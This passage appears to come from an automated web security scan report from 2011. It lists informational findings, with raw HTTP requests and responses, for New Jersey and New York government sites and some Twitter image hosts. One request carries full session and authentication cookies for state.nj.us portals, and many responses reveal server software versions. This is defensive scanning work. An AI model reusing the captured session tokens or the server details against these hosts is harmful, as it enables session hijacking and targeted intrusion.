<HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 404</P><P>Reason: File not found or unable to read file</P></BODY></HTML>

20.4. https://portal031.state.nj.us/* previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://portal031.state.nj.us
Path:	/*

Request

GET /* HTTP/1.1
Host: portal031.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 412 Precondition Failed
Date: Wed, 13 Jul 2011 01:53:06 GMT
Server: Apache
Last-Modified: Mon, 27 Oct 2008 17:00:57 GMT
ETag: "54b6-5f4-45a3f131dc440"
Accept-Ranges: bytes
Content-Length: 1524
Connection: close
Content-Type: text/html

<html>
<head>
<title>State of New Jersey - Please Log In</title>
<style>
p { font-family: sans-serif; font-size: 10pt }
</style>
<script language="JavaScript">
<!--
if (top != self) { top.location = l
...[SNIP]...

20.5. http://public.leginfo.state.ny.us/menugetf.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://public.leginfo.state.ny.us
Path:	/menugetf.cgi

Request

GET /menugetf.cgi HTTP/1.1
Host: public.leginfo.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
MIME-Version: 1.0
Date: Wed, 13 Jul 2011 01:52:41 GMT
Server: ESAWEB 3.7.0.0/ESASSL 4.1.0.0 Velocity Software, Inc. on z/VM V5R3.0
Content-location: HTTP://public.leginfo.state.ny.us/menugetf.cgi
Content-type: text/html
Content-Length: 341

<HTML>
<HEAD>
<TITLE>Bill Status Search by Bill Number </TITLE>
</HEAD>

<frameset framespacing="1" border=1 frameborder="1"
ROWS="30%,67%" BORDERCOLOR=BLACK >
<FRAME NAME="TOP" src="frmlo
...[SNIP]...

20.6. http://www.e-zpassny.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.e-zpassny.com
Path:	/

Request

GET / HTTP/1.1
Host: www.e-zpassny.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 218
Content-Type: text/html
Content-Location: http://www.e-zpassny.com/index.html
Last-Modified: Fri, 09 May 2008 17:51:06 GMT
Accept-Ranges: bytes
ETag: "0e14541fdb1c81:fc4"
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 01:51:34 GMT
Connection: close

<html>
<head>
<meta http-equiv="refresh" content="0;url=./en/home/index.shtml">
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="cache-control" content="no-cache">
</head>
<body>.
...[SNIP]...

20.7. http://www.house.gov/velazquez/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.house.gov
Path:	/velazquez/

Request

GET /velazquez/ HTTP/1.1
Host: www.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: USHR Webserver Ver 5.4.1
Content-Type: text/html
Last-Modified: Thu, 31 Mar 2011 21:22:52 GMT
ETag: "e5-4d94f0ac"
Date: Wed, 13 Jul 2011 01:51:36 GMT
Content-Length: 229
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Your Page Title</title>
<meta http-equiv="REFRESH" content="0;url=http://velazquez.house.gov/index.shtml"></HEAD
...[SNIP]...

20.8. http://www.judiciary.state.nj.us/kids/index.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.judiciary.state.nj.us
Path:	/kids/index.htm

Request

GET /kids/index.htm HTTP/1.1
Host: www.judiciary.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:39 GMT
Last-Modified: Fri, 20 May 2011 17:54:18 GMT
ETag: "150fd-7c3-cf88c680"
Accept-Ranges: bytes
Content-Length: 1987
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>NJ Courts Kids Page
...[SNIP]...

20.9. http://www.nj.gov/mvc/online/driverhistory.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nj.gov
Path:	/mvc/online/driverhistory.shtml

Request

GET /mvc/online/driverhistory.shtml HTTP/1.1
Host: www.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:54 GMT
Content-type: text/html
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<META HTTP-EQUIV="Refresh"
CONTENT="1; URL=https://emvc.state.nj.us/mvc/emvc_driverhistory.shtml">

</HEAD>

</html>

20.10. http://www.nj.gov/mynj/myNJRestrHelp.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nj.gov
Path:	/mynj/myNJRestrHelp.html

Request

GET /mynj/myNJRestrHelp.html HTTP/1.1
Host: www.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:59 GMT
Content-length: 15870
Content-type: text/html
Last-modified: Mon, 17 Mar 2008 20:29:08 GMT
Etag: "3dfe-47ded494"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>myNewJersey Help</title>
<link rel="stylesheet" href="/oit/styles/mynj3.css" type="text/css">
</head>

<script language="JavaScript">
<!--
function wJump(targ) {
var newURL =
...[SNIP]...

20.11. http://www.nj.gov/nj/deptserv.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nj.gov
Path:	/nj/deptserv.html

Request

GET /nj/deptserv.html HTTP/1.1
Host: www.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:59 GMT
Content-length: 347
Content-type: text/html
Last-modified: Tue, 09 Sep 2008 15:18:04 GMT
Etag: "15b-48c693ac"
Accept-ranges: bytes
Connection: close

<html>
<head>
<script language="JavaScript">
</script>
<meta http-
...[SNIP]...

20.12. http://www.nj.gov/nj/govinfo/njgov/alphaserv.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nj.gov
Path:	/nj/govinfo/njgov/alphaserv.html

Request

GET /nj/govinfo/njgov/alphaserv.html HTTP/1.1
Host: www.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:58 GMT
Content-length: 376
Content-type: text/html
Last-modified: Tue, 28 Oct 2008 12:05:36 GMT
Etag: "178-49070010"
Accept-ranges: bytes
Connection: close

<html>
<head>
<script language="JavaScript">
</sc
...[SNIP]...

20.13. http://www.opencube.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opencube.com
Path:	/

Request

GET / HTTP/1.1
Host: www.opencube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 134
Content-Type: text/html
Content-Location: http://www.opencube.com/Index.html
Last-Modified: Thu, 17 Jul 2008 17:58:38 GMT
Accept-Ranges: bytes
ETag: "b41f35bd36e8c81:2845"
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 01:50:16 GMT
Connection: close

<html><head><title></title><meta HTTP-EQUIV="REFRESH" content="0; url=http://www.opencube.com/index.asp"></head><body></body></html>

20.14. http://www.state.nj.us/health/vital/vital.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/health/vital/vital.htm

Request

GET /health/vital/vital.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:50 GMT
Content-length: 241
Content-type: text/html
Last-modified: Tue, 20 Feb 2007 15:53:21 GMT
Etag: "f1-45db1971"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>DHSS, Vital Statistics</title>
<meta http-equiv="refresh" content="0;URL=/health/vital/index.shtml">
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth=
...[SNIP]...

20.15. http://www.state.nj.us/lottery/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/

Request

GET /lottery/ HTTP/1.1
Host: www.state.nj.us
Proxy-Connection: keep-alive
Referer: http://www.state.nj.us/treasury/people.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2Fportal20.sa.state.nj.us_JSESSIONID=8B7AC0DFAC1D241DA769612C928B4D1F|portal20.sa.state.nj.us|/|iplanet; %2Fselfserviceportal20.sa.state.nj.us_JSESSIONID=CA18EEAFF644FACB71077AFF38C6D49C|portal20.sa.state.nj.us|/selfservice|iplanet; %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4SfczfjhoFFDpWNk0ih9CnFjKv6RlTaRw0JXs%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:43:04 GMT
Content-type: text/html
Connection: close
Content-Length: 376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="R
...[SNIP]...

20.16. http://www.state.nj.us/lottery/instant/2-0_instant_games.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/instant/2-0_instant_games.htm

Request

GET /lottery/instant/2-0_instant_games.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:22 GMT
Content-length: 397
Content-type: text/html
Last-modified: Wed, 06 Jul 2011 13:27:13 GMT
Etag: "18d-4e1462b1"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="R
...[SNIP]...

20.17. http://www.state.nj.us/mvc/online/roadtest.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/mvc/online/roadtest.shtml

Request

GET /mvc/online/roadtest.shtml HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:48 GMT
Content-type: text/html
Connection: close

<HTML>

<HEAD></HEAD>

<BODY bgcolor="#e6e6d9" text="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onload ="document.DTCStart.submit();">

<form name="DTCStart" method="
...[SNIP]...

20.18. http://www.state.nj.us/nj/deptserv.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/nj/deptserv.html

Request

GET /nj/deptserv.html HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:54 GMT
Content-length: 347
Content-type: text/html
Last-modified: Tue, 09 Sep 2008 15:18:04 GMT
Etag: "15b-48c693ac"
Accept-ranges: bytes
Connection: close

<html>
<head>
<script language="JavaScript">
</script>
<meta http-
...[SNIP]...

20.19. http://www.state.nj.us/nj/govinfo/njgov/alphaserv.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/nj/govinfo/njgov/alphaserv.html

Request

GET /nj/govinfo/njgov/alphaserv.html HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:53 GMT
Content-length: 376
Content-type: text/html
Last-modified: Tue, 28 Oct 2008 12:05:36 GMT
Etag: "178-49070010"
Accept-ranges: bytes
Connection: close

<html>
<head>
<script language="JavaScript">
</sc
...[SNIP]...

20.20. http://www.state.nj.us/transportation/commuter/trafficinfo/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/transportation/commuter/trafficinfo/

Request

GET /transportation/commuter/trafficinfo/ HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:52 GMT
Content-length: 867
Content-type: text/html
Last-modified: Fri, 16 May 2008 16:20:04 GMT
Etag: "363-482db434"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title></title>
<meta http-equiv="refresh" content="0; url=/transportation/commuter/511/">
</head>
<body>
          
   &
...[SNIP]...

20.21. http://www.state.nj.us/treasury/administration/grau/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/treasury/administration/grau/index.html

Request

GET /treasury/administration/grau/index.html HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:42 GMT
Content-length: 6343
Content-type: text/html
Last-modified: Thu, 10 Feb 2011 15:32:50 GMT
Etag: "18c7-4d540522"
Accept-ranges: bytes
Connection: close

<center>
<table WIDTH="700" BORDER="0" CELLSPACING="0" CELLPADDING="0" BGCOLOR="#FFFFFF">
<tr>
<td COLSPAN="2" ALIGN="left" VALIGN="top"><!-- #BeginLibraryItem "/treasury/administration/library/grau-
...[SNIP]...

20.22. http://www.state.nj.us/treasury/pensions/index2.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/treasury/pensions/index2.htm

Request

GET /treasury/pensions/index2.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:45 GMT
Content-length: 5193
Content-type: text/html
Last-modified: Thu, 25 Mar 2010 20:54:52 GMT
Etag: "1449-4babcd9c"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<HEAD>

...[SNIP]...

20.23. http://www.state.nj.us/treasury/pensions/pers1.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/treasury/pensions/pers1.htm

Request

GET /treasury/pensions/pers1.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:45 GMT
Content-length: 5302
Content-type: text/html
Last-modified: Thu, 25 Mar 2010 20:54:40 GMT
Etag: "14b6-4babcd90"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<HEAD>

...[SNIP]...

20.24. http://www.state.nj.us/treasury/pensions/pfrs1.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/treasury/pensions/pfrs1.htm

Request

GET /treasury/pensions/pfrs1.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:45 GMT
Content-length: 5305
Content-type: text/html
Last-modified: Thu, 25 Mar 2010 20:54:39 GMT
Etag: "14b9-4babcd8f"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<HEAD>

...[SNIP]...

20.25. http://www.state.nj.us/treasury/pensions/shbp.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/treasury/pensions/shbp.htm

Request

GET /treasury/pensions/shbp.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:45 GMT
Content-length: 5311
Content-type: text/html
Last-modified: Thu, 25 Mar 2010 20:54:24 GMT
Etag: "14bf-4babcd80"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<HEAD>

...[SNIP]...

20.26. http://www.state.nj.us/treasury/pensions/sprs1.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/treasury/pensions/sprs1.htm

Request

GET /treasury/pensions/sprs1.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:45 GMT
Content-length: 5297
Content-type: text/html
Last-modified: Thu, 25 Mar 2010 20:54:23 GMT
Etag: "14b1-4babcd7f"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<HEAD>

...[SNIP]...

20.27. http://www.state.nj.us/treasury/pensions/tpaf1.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/treasury/pensions/tpaf1.htm

Request

GET /treasury/pensions/tpaf1.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:45 GMT
Content-length: 5301
Content-type: text/html
Last-modified: Thu, 25 Mar 2010 20:54:21 GMT
Etag: "14b5-4babcd7d"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<HEAD>

...[SNIP]...

20.28. https://www1.state.nj.us/TYTR_Saver/jsp/common/Login.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www1.state.nj.us
Path:	/TYTR_Saver/jsp/common/Login.jsp

Request

GET /TYTR_Saver/jsp/common/Login.jsp HTTP/1.1
Host: www1.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.29. https://www16.state.nj.us/DOBI_BNKOLS/* previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www16.state.nj.us
Path:	/DOBI_BNKOLS/*

Request

GET /DOBI_BNKOLS/* HTTP/1.1
Host: www16.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:46 GMT
Content-length: 1022
Content-type: text/html
X-powered-by: Servlet/2.5
Date: Wed, 13 Jul 2011 01:49:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html><head><title>Sun GlassFish Enterprise Server v2.1.1 - Error report</title><style type
...[SNIP]...

20.30. https://www16.state.nj.us/DOBI_DEPGUDPA/* previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www16.state.nj.us
Path:	/DOBI_DEPGUDPA/*

Request

GET /DOBI_DEPGUDPA/* HTTP/1.1
Host: www16.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.31. https://www16.state.nj.us/NJ_PREMIER_EBIZ/* previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www16.state.nj.us
Path:	/NJ_PREMIER_EBIZ/*

Request

GET /NJ_PREMIER_EBIZ/* HTTP/1.1
Host: www16.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:46 GMT
Content-length: 1022
Content-type: text/html
X-powered-by: Servlet/2.5
Date: Wed, 13 Jul 2011 01:49:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html><head><title>Sun GlassFish Enterprise Server v2.1.1 - Error report</title><style type
...[SNIP]...

20.32. https://www16.state.nj.us/TYP_MBOSREG/* previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www16.state.nj.us
Path:	/TYP_MBOSREG/*

Request

GET /TYP_MBOSREG/* HTTP/1.1
Host: www16.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:46 GMT
Content-length: 1022
Content-type: text/html
X-powered-by: Servlet/2.5
Date: Wed, 13 Jul 2011 01:49:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html><head><title>Sun GlassFish Enterprise Server v2.1.1 - Error report</title><style type
...[SNIP]...

21. Content type incorrectly stated previous next
There are 13 instances of this issue:

http://a0.twimg.com/profile_images/688563731/maud_newton_normal.jpg
http://a1.twimg.com/profile_images/458966890/twitterProfilePhoto_normal.jpg
http://a2.twimg.com/profile_images/368371941/saveur_icon_normal.gif
http://a3.twimg.com/profile_images/497483711/MMlogo_normal.gif
http://de.gov/images/favicon.ico
https://egov.dnrec.delaware.gov/egovpublic/js/MenuItems.js
https://hi.state.nj.us/DOBI_RELOLTRF/*
https://maps-api-ssl.google.com/maps/api/js
http://maps.google.com/maps/api/js
https://portal01.state.nj.us/favicon.ico
http://twitter.com/account/available_features
http://www.bi2technologies.com/poormanscron/run-cron-check
http://www.delaware.gov/images/favicon.ico

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

21.1. http://a0.twimg.com/profile_images/688563731/maud_newton_normal.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a0.twimg.com
Path:	/profile_images/688563731/maud_newton_normal.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/688563731/maud_newton_normal.jpg HTTP/1.1
Host: a0.twimg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://twitter.com/

Response

HTTP/1.1 200 OK
x-amz-id-2: hWww5j16K8zTPqkULgY9HouFDVpgkVXdlPCKHrSv5ipurx/iFlcHdtPsVIy3Pm0s
x-amz-request-id: FB24F48E0FD60863
Last-Modified: Thu, 11 Feb 2010 02:26:29 GMT
ETag: "8e08f84f19f81765ac7dada0e8ac2453"
Accept-Ranges: bytes
Content-Length: 4904
Server: AmazonS3
X-Amz-Cf-Id: bc0809729bea6a05761fd6df6c62ccb62adde9f1806a9c04fd9437c780f4e33a946edc215f461563,82f06ee275cbdaf7a6f8f7d50d26cc3256e9382b1fe5081ad722b0bc143610f4f82e4629a14c221b
X-CDN: AKAM
X-CDN: AKAM
X-CDN: AKAM
X-CDN: AKAM
X-CDN: AKAM
Cache-Control: max-age=16429705
Expires: Thu, 19 Jan 2012 05:55:33 GMT
Date: Wed, 13 Jul 2011 02:07:08 GMT
Connection: close
Content-Type: image/jpeg
X-CDN: AKAM

.PNG
.
...IHDR...0...0.....W.......bKGD............. oFFs.........A...... pHYs...H...H.F.k>... vpAg...9...0.........IDATh.....d.u..=.!.....G.... h#..V8......wp..o........#|..(..F...B...aL.=..U.U.s.q
...[SNIP]...

21.2. http://a1.twimg.com/profile_images/458966890/twitterProfilePhoto_normal.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a1.twimg.com
Path:	/profile_images/458966890/twitterProfilePhoto_normal.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/458966890/twitterProfilePhoto_normal.jpg HTTP/1.1
Host: a1.twimg.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: b23eFireKRe0HmkLcAKu1LTdA+2bUyyTFsRNWoPjkCQv9bzHp+ToTWJuXw9AcZVX
x-amz-request-id: C051EA2B6946C892
Last-Modified: Thu, 08 Oct 2009 04:29:39 GMT
ETag: "b24e7b60c179eeea4b20cd59874b9b0a"
Accept-Ranges: bytes
